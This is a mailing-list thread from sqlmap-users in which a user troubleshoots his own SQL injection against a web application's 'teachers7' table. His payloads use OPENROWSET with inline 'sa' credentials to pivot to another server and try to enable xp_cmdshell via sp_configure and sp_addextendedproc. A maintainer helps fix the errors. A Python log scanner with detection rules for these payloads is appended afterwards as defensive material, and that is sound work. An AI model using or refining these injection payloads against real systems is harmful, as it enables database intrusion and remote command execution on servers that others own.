Re: [sqlmap-users] error with ms sql
From: Adi M. <adi...@ya...> - 2012-06-21 11:12:17
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',' select @@version; master..sp_configure ''xp_cmdshell'',1 ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808

the problem is with the query:

select @@version; master..sp_configure ''xp_cmdshell'',1

Any possibility to give the string from ascii codes as in mysql?

________________________________
From: Miroslav Stampar <mir...@gm...>
To: Adi Mutu <adi...@ya...>
Cc: "sql...@li..." <sql...@li...>
Sent: Thursday, June 21, 2012 2:01 PM
Subject: Re: [sqlmap-users] error with ms sql

It all depends on context. You'll need to send a sample that you want to run. Quotes are not interpreted/parsed everywhere the same.

Kind regards

On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote:

>my feeling is that "[OLE/DB provider returned message: Deferred prepare could not be completed." is because of an sql error:) so my fault.
>
>and regarding the second error, I think you must always return some columns in the query, such as select @@version.
>
>now question is how do I embed a string inside another string delimited with quotes? Looks like double quotes is not working.....doubling quote '' looks like not working always....
>
>________________________________
>From: Adi Mutu <adi...@ya...>
>To: Miroslav Stampar <mir...@gm...>
>Cc: "sql...@li..." <sql...@li...>
>Sent: Thursday, June 21, 2012 11:45 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>tried, same stuff.
>I've tried to reenable xp_cmdshell first with
>
>master..sp_configure 'show advanced options',1
>reconfigure
>master..sp_configure 'xp_cmdshell',1
>reconfigure
>
>and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.]
>
>then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
>and got error:
>
>OLE DB error trace [Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '].
>
>________________________________
>From: Miroslav Stampar <mir...@gm...>
>To: Adi Mutu <adi...@ya...>
>Cc: "sql...@li..." <sql...@li...>
>Sent: Thursday, June 21, 2012 11:26 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>try with master..resultabcd
>
>I forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql
>
>On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote:
>
>>Hi Miroslav,
>>
>>got db_name master and tried with master.resultabcd but I get the same error.
>>
>>Kind Regards,
>>A.
>>
>>________________________________
>>From: Miroslav Stampar <mir...@gm...>
>>To: Adi Mutu <adi...@ya...>
>>Cc: "sql...@li..." <sql...@li...>
>>Sent: Thursday, June 21, 2012 11:11 AM
>>Subject: Re: [sqlmap-users] error with ms sql
>>
>>Hi Adi.
>>
>>You could try prepending the database name to the resultbcd.
>>It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)
>>
>>Kind regards,
>>Miroslav Stampar
>>
>>On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote:
>>
>>>I'm having an injection like this:
>>>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
>>>
>>>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>>>
>>>and when I try to select from resultabcd I get:
>>>[OLE/DB provider returned message: Deferred prepare could not be completed.]
>>>
>>>could not find a good answer with google. Thanks.
>>>
>>>Kind regards,
>>>A.
>>>_______________________________________________
>>>sqlmap-users mailing list
>>>sql...@li...
>>>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>--
>>Miroslav Stampar
>>http://about.me/stamparm
>
>--
>Miroslav Stampar
>http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
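
For defenders, the payloads quoted in this thread leave recognisable traces in web server access logs. The following is an added example (not part of the original messages and not sqlmap code) that flags OPENROWSET calls carrying inline SQLOLEDB credentials, sp_configure enabling xp_cmdshell, and sp_addextendedproc in request parameters. The log format, the /teachers.asp endpoint, the client addresses and the rule names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Indicators taken from the payloads quoted in this thread.
RULES = {
    "openrowset_inline_creds": re.compile(
        r"openrowset\s*\(\s*'sqloledb'\s*,\s*'[^']*\b(?:uid|pwd)\s*=", re.I),
    "sp_configure_xp_cmdshell": re.compile(
        r"sp_configure\s+'{1,2}xp_cmdshell'{1,2}\s*,\s*1", re.I),
    "sp_addextendedproc": re.compile(r"\bsp_addextendedproc\b", re.I),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return (client_ip, sorted rule names hit); query values are percent-decoded first."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    hits = set()
    for _, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    return m["ip"], sorted(hits)

def scan(lines):
    """Map client IP -> set of rule names, for lines with at least one hit."""
    flagged = {}
    for line in lines:
        ip, hits = scan_line(line)
        if hits:
            flagged.setdefault(ip, set()).update(hits)
    return flagged

def _log(ip, value):
    # Constructed Apache-style line; /teachers.asp is a hypothetical endpoint.
    return (f'{ip} - - [21/Jun/2012:11:12:17 +0000] '
            f'"GET /teachers.asp?id={quote(value)} HTTP/1.1" 200 512')

# Constructed sample input; payloads abbreviated from the ones in the thread.
SAMPLE_LOG = [
    _log("10.0.0.5", "808"),
    _log("10.0.0.9", "-1 union all select '1',(select * from OPENROWSET("
         "'SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',"
         "' select @@version; master..sp_configure ''xp_cmdshell'',1 '))"),
    _log("10.0.0.9", "-1 union all select (select * from OPENROWSET('SQLOLEDB',"
         "'uid=sa;pwd=1234','exec sp_addextendedproc \"xp_cmdshell\",\"xp_log70.dll\" '))"),
]

if __name__ == "__main__":
    print({ip: sorted(rules) for ip, rules in scan(SAMPLE_LOG).items()})
```

The rules match only the decoded query string of GET/POST request lines, so payloads sent in a POST body need the same patterns applied to application or database audit logs instead.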